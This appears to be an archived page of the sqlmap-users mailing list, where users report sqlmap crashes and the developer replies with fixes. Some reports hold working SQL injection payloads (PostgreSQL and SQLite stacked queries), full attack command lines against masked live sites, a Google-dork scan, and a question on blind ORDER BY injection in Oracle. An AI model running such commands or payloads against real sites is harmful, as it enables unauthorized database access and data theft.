> in __setOutputResume > resumeConfKb(expression, url, value) > File "C:\pentest\sqlmap-0.9\lib\core\session.py", line 333 > , in resumeConfKb > if injection.parameter in conf.paramDict[injection.place]: > KeyError: 'Cookie' > > [*] shutting down at: 20:04:09 > > ------------------------------------------------------------------------------ > Forrester recently released a report on the Return on Investment (ROI) of > Google Apps. They found a 300% ROI, 38%-56% cost savings, and break-even > within 7 months. Over 3 million businesses have gone Google with Google Apps: > an online email calendar, and document program that's accessible from your > browser. Read the Forrester report: http://p.sf.net/sfu/googleapps-sfnew > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <nig...@em...> - 2010-12-21 19:13:58
|
sqlmap -u "http://xxxxxx.xxx/content.php?show=galleries§ion=217&page=2" -a C:\pentest\sqlmap-0.9\txt\user-agents.txt --auth-type=basic --auth-cred=mja345:rewind --level 5 --risk 3 --current-user --current-db --is-dba --dbs sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 20:04:07 [20:04:08] [INFO] fetched random HTTP User-Agent header from file 'C:\pentest\sqlmap-0.9\txt\user-agents.txt': Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125 [20:04:08] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxxx.xxx\session' as session file [20:04:08] [INFO] resuming injection data from session file [20:04:08] [INFO] resuming injection data from session file [20:04:08] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.6 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap-0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", line 245, in start setupTargetEnv() File "C:\pentest\sqlmap-0.9\lib\core\target.py", line 285, in setupTargetEnv __setOutputResume() File "C:\pentest\sqlmap-0.9\lib\core\target.py", line 170, in __setOutputResume resumeConfKb(expression, url, value) File "C:\pentest\sqlmap-0.9\lib\core\session.py", line 333 , in resumeConfKb if injection.parameter in conf.paramDict[injection.place]: KeyError: 'Cookie' [*] shutting down at: 20:04:09 |
|
From: Miroslav S. <mir...@gm...> - 2010-12-21 00:46:36
|
hi nightman. thank you for your commit and find it fixed in the latest commit. kind regards. On Tue, Dec 21, 2010 at 1:08 AM, <nig...@em...> wrote: > sqlmap -u "http://xxxxxxx.xxx/update_thumb.php?e=263&s=6" -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 00:23:50 > > [00:23:50] [INFO] fetched random HTTP User-Agent header from file 'C:\pentest\sqlmap.0.9\txt\user-agents.txt': > Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50 > [00:23:50] [INFO] using 'C:\pentest\sqlmap.0.9\output\xxxxxx\session' as session file > [00:23:50] [INFO] testing connection to the target url > [00:23:51] [INFO] testing if the url is stable, wait a few seconds > [00:23:53] [INFO] url is stable > many tests > [00:34:15] [INFO] GET parameter 's' is 'MySQL > 5.0.11 AND time-based blind' injectable > GET parameter 's' is vulnerable. Do you want to keep testing the others? [y/N] y > more tests > [00:52:02] [INFO] testing 'Firebird AND error-based - WHERE clause' > > [00:52:02] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentestsqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 352, in start > injection = checkSqlInjection(place, parameter, value) > File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 165, in checkSqlInjection > fstPayload = unescapeDbms(fstPayload, injection, dbms) > File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 65, in unescapeDbms > payload = unescape(payload, dbms) > File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 53, in unescape > return unescaper[dbms](string) > File "C:\pentest\sqlmap.0.9\plugins\dbms\firebird\syntax.py", line 21, in unescape > if isDBMSVersionAtLeast('2.1'): > File "C:\pentest\sqlmap.0.9\lib\core\common.py", line 1752, in isDBMSVersionAtLeast > value = float(value.replace(">", "")) + 0.01 > ValueError: invalid literal for float(): 5.0.11 > > [*] shutting down at: 00:52:02 > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <nig...@em...> - 2010-12-21 00:08:25
|
sqlmap -u "http://xxxxxxx.xxx/update_thumb.php?e=263&s=6" -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 00:23:50 [00:23:50] [INFO] fetched random HTTP User-Agent header from file 'C:\pentest\sqlmap.0.9\txt\user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.50 [00:23:50] [INFO] using 'C:\pentest\sqlmap.0.9\output\xxxxxx\session' as session file [00:23:50] [INFO] testing connection to the target url [00:23:51] [INFO] testing if the url is stable, wait a few seconds [00:23:53] [INFO] url is stable many tests [00:34:15] [INFO] GET parameter 's' is 'MySQL > 5.0.11 AND time-based blind' injectable GET parameter 's' is vulnerable. Do you want to keep testing the others? [y/N] y more tests [00:52:02] [INFO] testing 'Firebird AND error-based - WHERE clause' [00:52:02] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentestsqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 352, in start injection = checkSqlInjection(place, parameter, value) File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 165, in checkSqlInjection fstPayload = unescapeDbms(fstPayload, injection, dbms) File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 65, in unescapeDbms payload = unescape(payload, dbms) File "C:\pentest\sqlmap.0.9\lib\controller\checks.py", line 53, in unescape return unescaper[dbms](string) File "C:\pentest\sqlmap.0.9\plugins\dbms\firebird\syntax.py", line 21, in unescape if isDBMSVersionAtLeast('2.1'): File "C:\pentest\sqlmap.0.9\lib\core\common.py", line 1752, in isDBMSVersionAtLeast value = float(value.replace(">", "")) + 0.01 ValueError: invalid literal for float(): 5.0.11 [*] shutting down at: 00:52:02 |
|
From: Miroslav S. <mir...@gm...> - 2010-12-20 23:49:30
|
hi m4l1c3. apparently i've used some features from Python 2.6 (that 'ident' attribute) for identifying threads (i've done some code update with thread dependent data). now, that ident is replaced by a standard python function 'hash' which should suffice. find it fixed in the latest commit. kr On Tue, Dec 21, 2010 at 12:35 AM, m4l1c3 <mal...@gm...> wrote: > > ./sqlmap.py -g "site:www.SOMEPLACE.com ext:php" --dbs --batch > > > sqlmap version: 0.9-dev (r2731) > Python version: 2.5.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 79, in main > start() > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 247, in start > if not checkConnection(suppressOutput=conf.forms) or not checkString() > or not checkRegexp(): > File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 756, in > checkConnection > page, _ = Request.queryPage(content=True) > File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 355, in > queryPage > threadData = getCurrentThreadData() > File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1552, in > getCurrentThreadData > threadID = getCurrentThreadID() > File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1545, in > getCurrentThreadID > return threading.currentThread().ident > AttributeError: '_MainThread' object has no attribute 'ident' > > > ALSO > > ./sqlmap.py -u > "http://www.SOMEPLACE.ca/index.php?name=xxxxxxxxxx&file=Xxxxxxxxxxxx&t=999999&start=99" > > sqlmap version: 0.9-dev (r2731) > Python version: 2.5.2 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 79, in main > start() > File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line > 247, in start > if not checkConnection(suppressOutput=conf.forms) or not checkString() > or not checkRegexp(): > File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 756, in > checkConnection > page, _ = Request.queryPage(content=True) > File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 355, in > queryPage > threadData = getCurrentThreadData() > File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1552, in > getCurrentThreadData > threadID = getCurrentThreadID() > File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1545, in > getCurrentThreadID > return threading.currentThread().ident > AttributeError: '_MainThread' object has no attribute 'ident' > > > > Many thanks for your past quick responses. > > > > > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: m4l1c3 <mal...@gm...> - 2010-12-20 23:36:01
|
./sqlmap.py -g "site:www.SOMEPLACE.com ext:php" --dbs --batch sqlmap version: 0.9-dev (r2731) Python version: 2.5.2 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 79, in main start() File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 247, in start if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 756, in checkConnection page, _ = Request.queryPage(content=True) File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 355, in queryPage threadData = getCurrentThreadData() File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1552, in getCurrentThreadData threadID = getCurrentThreadID() File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1545, in getCurrentThreadID return threading.currentThread().ident AttributeError: '_MainThread' object has no attribute 'ident' ALSO ./sqlmap.py -u " http://www.SOMEPLACE.ca/index.php?name=xxxxxxxxxx&file=Xxxxxxxxxxxx&t=999999&start=99 " sqlmap version: 0.9-dev (r2731) Python version: 2.5.2 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 79, in main start() File "/pentest/database/sqlmap-dev/lib/controller/controller.py", line 247, in start if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): File "/pentest/database/sqlmap-dev/lib/controller/checks.py", line 756, in checkConnection page, _ = Request.queryPage(content=True) File "/pentest/database/sqlmap-dev/lib/request/connect.py", line 355, in queryPage threadData = getCurrentThreadData() File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1552, in getCurrentThreadData threadID = getCurrentThreadID() File "/pentest/database/sqlmap-dev/lib/core/common.py", line 1545, in getCurrentThreadID return threading.currentThread().ident AttributeError: '_MainThread' object has no attribute 'ident' Many thanks for your past quick responses. |
|
From: Miroslav S. <mir...@gm...> - 2010-12-20 22:39:35
|
hi. it seems that it wasn't previously properly fixed (by me). now it shouldn't be a problem any more. kr On Fri, Dec 17, 2010 at 8:48 AM, Miroslav Stampar <mir...@gm...> wrote: > thx a lot nightman. > > find it fixed in the latest revision from SVN repository. > > kr > > On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: >> sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b >> [03:44:42] [INFO] testing connection to the target url >> [03:44:52] [INFO] testing NULL connection to the target url >> [03:44:57] [INFO] testing if the url is stable, wait a few seconds >> [03:45:00] [INFO] url is stable >> all the tests.... >> >> Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y >> sqlmap identified the following injection points with 10051 HTTP(s) requests: >> --- >> Place: GET >> Parameter: xxx >> Type: stacked queries >> Title: PostgreSQL < 8.2 stacked queries (Glibc) >> Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| >> |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 >> 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 >> >> Place: Cookie >> Parameter: app_state >> Type: stacked queries >> Title: SQLite > 2.0 stacked queries (heavy query) >> Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 >> 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 >> --- >> >> there were multiple injection points, please select the one to use for following injections: >> [0] place: GET, parameter: xxx, type: Unescaped numeric (default) >> [1] place: Cookie, parameter: app_state, type: LIKE single quoted string >> [q] Quit >>> 0 >> [07:24:11] [INFO] testing PostgreSQL >> [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL >> [07:24:12] [INFO] testing MySQL >> [07:24:12] [WARNING] the back-end DBMS is not MySQL >> [07:24:12] [INFO] testing Oracle >> [07:24:12] [WARNING] the back-end DBMS is not Oracle >> [07:24:12] [INFO] testing Microsoft SQL Server >> [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server >> [07:24:13] [INFO] the back-end DBMS is SQLite >> [07:24:13] [INFO] fetching banner >> [07:24:13] [INFO] retrieving the length of query output >> [07:24:13] [INFO] retrieved: >> [07:24:16] [INFO] retrieved: >> [07:24:19] [INFO] testing SQLite >> [07:24:20] [WARNING] the back-end DBMS is not SQLite >> [07:24:20] [INFO] testing Microsoft Access >> [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access >> [07:24:21] [INFO] testing Firebird >> [07:24:21] [WARNING] the back-end DBMS is not Firebird >> [07:24:21] [INFO] testing SAP MaxDB >> [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB >> [07:24:22] [INFO] testing Sybase >> [07:24:22] [WARNING] the back-end DBMS is not Sybase >> >> [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio >> n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi >> ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get >> back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: nt >> Traceback (most recent call last): >> File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main >> start() >> File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start >> action() >> File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action >> dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) >> AttributeError: 'NoneType' object has no attribute 'getFingerprint' >> >> [*] shutting down at: 07:24:22 >> >> ------------------------------------------------------------------------------ >> Lotusphere 2011 >> Register now for Lotusphere 2011 and learn how >> to connect the dots, take your collaborative environment >> to the next level, and enter the era of Social Business. >> http://p.sf.net/sfu/lotusphere-d2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Buggy <bug...@gm...> - 2010-12-19 07:39:28
|
Hello, First, let me thank you for the great tool and the steady bugfixing and improving! I (and sqlmap) have found my new nemesis concerning SQL injection: injecting in the ORDER BY clause: I am currently doing work on a webapp based on an ORACLE database and can inject here: SELECT foo, bar FROM the_table ORDER BY [INJECTION] 1) The mean thing is you cannot use UNION because of the ORDER BY clause => Any hints on how to get a working injection going here? Has anyone ever encountered this rare case? 2) the furthest I have gotten in a try to get into a blind sql injection situation is the following: [INJECTION] = decode ((select 'a' from dual),'a',foo,bar) depending on whether a or something else is selected, the ouput is sorted by column foo or column bar the idea is to ask the question here (pseudocode): decode ((select first letter of first username < chr(128)),TRUE,foo,bar) but it doesnt work as I do not know how to write the question query or how to decide if the answer is TRUE or FALSE => is there some hint how to continue from here and maybe even get the thing working with sqlmap? Cheers, Karl |
|
From: Buggy <bug...@gm...> - 2010-12-19 07:38:20
|
Hello, First, let me thank you for the great tool and the steady bugfixing and improving! I (and sqlmap) have found my new nemesis concerning SQL injection: injecting in the ORDER BY clause: I am currently doing work on a webapp based on an ORACLE database and can inject here: SELECT foo, bar FROM the_table ORDER BY [INJECTION] 1) The mean thing is you cannot use UNION because of the ORDER BY clause => Any hints on how to get a working injection going here? Has anyone ever encountered this rare case? 2) the furthest I have gotten in a try to get into a blind sql injection situation is the following: [INJECTION] = decode ((select 'a' from dual),'a',foo,bar) depending on whether a or something else is selected, the ouput is sorted by column foo or column bar the idea is to ask the question here (pseudocode): decode ((select first letter of first username < chr(128)),TRUE,foo,bar) but it doesnt work as I do not know how to write the question query or how to decide if the answer is TRUE or FALSE => is there some hint how to continue from here and maybe even get the thing working with sqlmap? Cheers, Karl |
|
From: Miroslav S. <mir...@gm...> - 2010-12-18 10:48:00
|
Hi David. Now there is a Ctrl+C check inside of detection mode for this kind of stuff: ... [11:45:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE clause' [11:45:46] [WARNING] Ctrl+C detected in detection phase How do you want to proceed? [(S)kip current test/(a)bort detection/(q)uit] ... Skip current test will literary skip the current test and start the other, abort detection will abort detection phase and use the information gathered till then, while quit will abruptly stop the execution of the program. For time based "tests" there will be a "delay" between Ctrl+C pressed and the presented question, but it will be presented for sure. Kind regards On Wed, Dec 1, 2010 at 8:35 PM, David Guimaraes <sk...@gm...> wrote: > Is there any way to make sqlmap not conduct further tests on the site? > (stacked, error, time-based, etc.). > > The problem is that during the identification of types of sqli allowed, it > hangs on a test and terminates the program without allowing me to exploit > the flaw. > > Example: > > Revision: 2468 > > $ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p > vulnparam --threads 20 --dbs -v 2 > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 17:23:43 > > [17:23:43] [DEBUG] cleaning up configuration parameters > [17:23:43] [DEBUG] setting the HTTP timeout > [17:23:43] [DEBUG] setting the HTTP method to GET > [17:23:43] [DEBUG] setting the UNION query SQL injection range of columns > [17:23:43] [DEBUG] creating HTTP requests opener object > [17:23:43] [INFO] using > '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file > [17:23:43] [INFO] testing connection to the target url > [17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not > into the Cookie > [17:23:44] [INFO] testing if the url is stable, wait a few seconds > [17:23:46] [INFO] url is stable > [17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be > injectable (possible DBMS: MySQL) > [17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam' > [17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause' > sqlmap got a 302 redirect to /home/l.php - What target address do you want > to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or > provide another target address based also on the redirection got from the > application > >> > [17:23:52] [DEBUG] setting match ratio for current parameter to default > value 0.900 > [17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - > WHERE clause' injectable > [17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' > because the risk is higher than the provided > [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP > BY and ORDER BY clauses' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY > and ORDER BY clauses' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - ORDER BY clause' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY > clause' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP > BY and ORDER BY clauses' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY > and ORDER BY clauses' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based > blind - ORDER BY clause' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY > clause' because the level is higher than the provided > [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause' > [17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - > WHERE clause' injectable > [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' > because the back-end DBMS identified is MySQL > [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > WHERE clause' because the back-end DBMS identified is MySQL > [17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because > the back-end DBMS identified is MySQL > [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > ORDER BY clause' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' > because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and > ORDER BY clauses' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - > ORDER BY clause' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' > because the level is higher than the provided > [17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries' > [17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because > the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because > the back-end DBMS identified is MySQL > [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists > function' because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' > because the level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked > queries' because the back-end DBMS identified is MySQL > [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level > is higher than the provided > [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level > is higher than the provided > [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level > is higher than the provided > [17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the > level is higher than the provided > [17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the > level is higher than the provided > [17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap > is going to retry the request > [17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap > is going to retry the request > [17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap > is going to retry the request > [17:26:13] [CRITICAL] unable to connect to the target url or proxy > > [*] shutting down at: 17:26:13 > > David > > ------------------------------------------------------------------------------ > Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! > Tap into the largest installed PC base & get more eyes on your game by > optimizing for Intel(R) Graphics Technology. Get started today with the > Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. > http://p.sf.net/sfu/intelisp-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-12-17 07:48:39
|
thx a lot nightman. find it fixed in the latest revision from SVN repository. kr On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: > sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b > [03:44:42] [INFO] testing connection to the target url > [03:44:52] [INFO] testing NULL connection to the target url > [03:44:57] [INFO] testing if the url is stable, wait a few seconds > [03:45:00] [INFO] url is stable > all the tests.... > > Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y > sqlmap identified the following injection points with 10051 HTTP(s) requests: > --- > Place: GET > Parameter: xxx > Type: stacked queries > Title: PostgreSQL < 8.2 stacked queries (Glibc) > Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| > |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 > 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 > > Place: Cookie > Parameter: app_state > Type: stacked queries > Title: SQLite > 2.0 stacked queries (heavy query) > Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 > 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 > --- > > there were multiple injection points, please select the one to use for following injections: > [0] place: GET, parameter: xxx, type: Unescaped numeric (default) > [1] place: Cookie, parameter: app_state, type: LIKE single quoted string > [q] Quit >> 0 > [07:24:11] [INFO] testing PostgreSQL > [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL > [07:24:12] [INFO] testing MySQL > [07:24:12] [WARNING] the back-end DBMS is not MySQL > [07:24:12] [INFO] testing Oracle > [07:24:12] [WARNING] the back-end DBMS is not Oracle > [07:24:12] [INFO] testing Microsoft SQL Server > [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server > [07:24:13] [INFO] the back-end DBMS is SQLite > [07:24:13] [INFO] fetching banner > [07:24:13] [INFO] retrieving the length of query output > [07:24:13] [INFO] retrieved: > [07:24:16] [INFO] retrieved: > [07:24:19] [INFO] testing SQLite > [07:24:20] [WARNING] the back-end DBMS is not SQLite > [07:24:20] [INFO] testing Microsoft Access > [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access > [07:24:21] [INFO] testing Firebird > [07:24:21] [WARNING] the back-end DBMS is not Firebird > [07:24:21] [INFO] testing SAP MaxDB > [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB > [07:24:22] [INFO] testing Sybase > [07:24:22] [WARNING] the back-end DBMS is not Sybase > > [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start > action() > File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action > dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) > AttributeError: 'NoneType' object has no attribute 'getFingerprint' > > [*] shutting down at: 07:24:22 > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > 